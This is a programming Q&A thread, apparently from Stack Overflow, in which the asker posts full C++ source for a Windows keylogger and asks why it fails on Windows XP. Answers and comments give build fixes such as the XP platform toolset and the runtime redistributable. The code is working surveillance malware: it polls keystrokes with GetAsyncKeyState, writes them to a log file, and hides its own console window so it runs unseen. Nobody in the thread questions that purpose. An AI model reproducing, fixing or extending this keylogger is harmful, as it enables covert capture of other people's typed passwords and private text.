# Why this code couldn't run in windows XP

Tags: c, winapi, keylogger

i'm compiling the following code in visual studio 2013. It's running on my windows seven that i compile code on it. But when i moved exe file into another windows such windows xp sp2, it can't run on it. When i run this exe file on windows xp sp2, in output the following message displayed for me.

> keylogger.exe is not a valid win32 application.

How can i make it this error fix? the following code is source code of the program which has error.

```
#include <iostream>
#include <windows.h>
#include <winuser.h>

using namespace std;     //used to avoid the compilation errors because of redefinition of variables.

int SaveLogs(int key_stroke, char *file);
void Stealth();  //Declare stealth function to make you keylogger hidden

int main()
{
    Stealth();          // This will call the stealth function.
    char i;             //Here we declare 'i' from the type 'char'

    while (1){
        // Here we say 'while (1)' execute the code.
        for (i = 8; i <= 190; i++){
            if (GetAsyncKeyState(i) == -32767)
                SaveLogs(i, "MYLOGS.txt"); 
            // This will send the value of 'i' and "MYLOGS.txt" to our SaveLogs function.
        }
    }

    system("PAUSE"); // Here we say that the system have to wait before exiting.
    return 0;
}

int SaveLogs(int key_stroke, char *file)   // Here we define our SaveLogs function.
{
    if ((key_stroke == 1) || (key_stroke == 2))
        return 0;

    FILE *OUTPUT_FILE;
    OUTPUT_FILE = fopen(file, "a+");

    cout << key_stroke << endl;

    if (key_stroke == 8)  // The numbers stands for the ascii value of a character
        fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
    else if (key_stroke == 13)
        fprintf(OUTPUT_FILE, "%s", "\n");
    else if (key_stroke == 32)
        fprintf(OUTPUT_FILE, "%s", " ");
    else if (key_stroke == VK_TAB)
        fprintf(OUTPUT_FILE, "%s", "[TAB]");
    else if (key_stroke == VK_SHIFT)
        fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
    else if (key_stroke == VK_CONTROL)
        fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
    else if (key_stroke == VK_ESCAPE)
        fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
    else if (key_stroke == VK_END)
        fprintf(OUTPUT_FILE, "%s", "[END]");
    else if (key_stroke == VK_HOME)
        fprintf(OUTPUT_FILE, "%s", "[HOME]");
    else if (key_stroke == VK_LEFT)
        fprintf(OUTPUT_FILE, "%s", "[LEFT]");
    else if (key_stroke == VK_UP)
        fprintf(OUTPUT_FILE, "%s", "[UP]");
    else if (key_stroke == VK_RIGHT)
        fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
    else if (key_stroke == VK_DOWN)
        fprintf(OUTPUT_FILE, "%s", "[DOWN]");
    else if (key_stroke == 190 || key_stroke == 110)
        fprintf(OUTPUT_FILE, "%s", ".");
    else
        fprintf(OUTPUT_FILE, "%s", &key_stroke);

    fclose(OUTPUT_FILE);
    return 0;
}

void Stealth()
{
    HWND Stealth;
    AllocConsole();
    Stealth = FindWindowA("ConsoleWindowClass", NULL);
    ShowWindow(Stealth, 0);
}
```

Comment: Are you sure that this should not say `win32` instead of `win342`? Are you compiling the application as a  64 bit application by chance?

Comment: Simple guess: you're running a 64-bit application on a 32-bit version of Windows

Comment: Andreas: No i compiled this code as 32 bit application in visual studio 32. But when i moved this code to virtual windows xp sp2, it can't run. but in my host windows seven it works well.

Comment: no, you didnt. Windows doesnt lie about architectural problems. Maybe watch a tutorial on how to choose platforms in visual studio. By the way : if you try to compile a application which works on extremely old versions of windows like XP you will run into a lot of problems, this is just the beginning. Either write software for obsolete operating systems or write them for modern ones - both at the same time is ... nigh-impossible, especially with languages like C/C++. You MAY have _SOME_ luck with .NET but even that framework is very limited in this particular case - XP is unsupported.

Comment: @specializt : writing applicaltions in c/c++ thast run on both Windows XP SP2 and any newer version of Windows is absolutely no problem.

Comment: you have have clearly never tried to actually write real software for all of these versions of windows at the same time so stop making assumptions, please. Even the most basic libraries got exchanged in newer versions, linking against them will produce crashes at some point - because functions have been renamed, modified or even removed in the meantime. Thats pretty much basic knowledge. If it were that easy microsoft would'nt have needed to drop the support for older windows-versions so even the creators themselves tend to disagree on your claim.

Comment: @specializt : actually I'm maintaining several (real) software programs that run perfectly on all Windows operations systems from Windows XP SP2 on upwords. Of course you cannot use API functions that don't exist in XP and there are some precautions to be taken, but it's not that difficult.

Answer (score 3, accepted):

This is not related to your program but to the platform toolset which does not support Windows XP.

In Visual Studio 2013 use the command **PROJECT -  Properties**, and under **Configuration Properties->General->Platform Toolset** choose "Visual Studio 2013 - Windows XP (v120_xp)" or any other toolset that contains "_xp".

Comment: Thank you sir, it's work now. but when the program started it shows this message " This application has failed to start because MSVCP120.dll was not found. Re-installing the application may fix this problem. " how can i fix this now ?!

Comment: It's because you try to run the debug version. Try with the release version, that should work.

Comment: You also may need to install the VC redistributable you can download from [here](http://www.microsoft.com/en-us/download/details.aspx?id=40784). And please accept the answer if it helped you.

Comment: No it is release version michael. but it shows the error.

Comment: OK, what happens if you install the redistributable on your XP ?

Answer (score 2):

Assumed that you chose the correctly target architecture (x86 vs. amd64) maybe you used a Version of the Winapi that is not supported by WinXP.
You have to correctly set the `WINVER` and `_WIN32_WINNT` defines to define which API version to use. If you set them to low some functinonality may not be available but your program will also run on older windows versions, preconditioned that the correct runtime dlls are installed.

Carefully read this article to learn how to chose a API level:
http://msdn.microsoft.com/en-us/library/windows/desktop/aa383745%28v=vs.85%29.aspx

Answer (score 1):

Your Windows 7 is 64-bit

Your Windows XP is 32-bit

Keylogger.exe is a 64-bit application that only runs on a 64-bit Windows = your Windows 7

Comment: No, my windows seven is x86 and my windows xp is x86 too. but my windows xp runs in virtual machine.

Comment: Wrong answer, Keylogger.exe is a 32 bit application.

Comment: @specializt Apart from all the x64 ones

Comment: its kinda sad to see people with this much reputation and this little knowledge about processor architecture ... every consumer-grade, 64 bit desktop-CPU is x86, you will have a lot of research to do.

Comment: What he means by x86 is 32 bit x86 rather than x86-64 or amd64.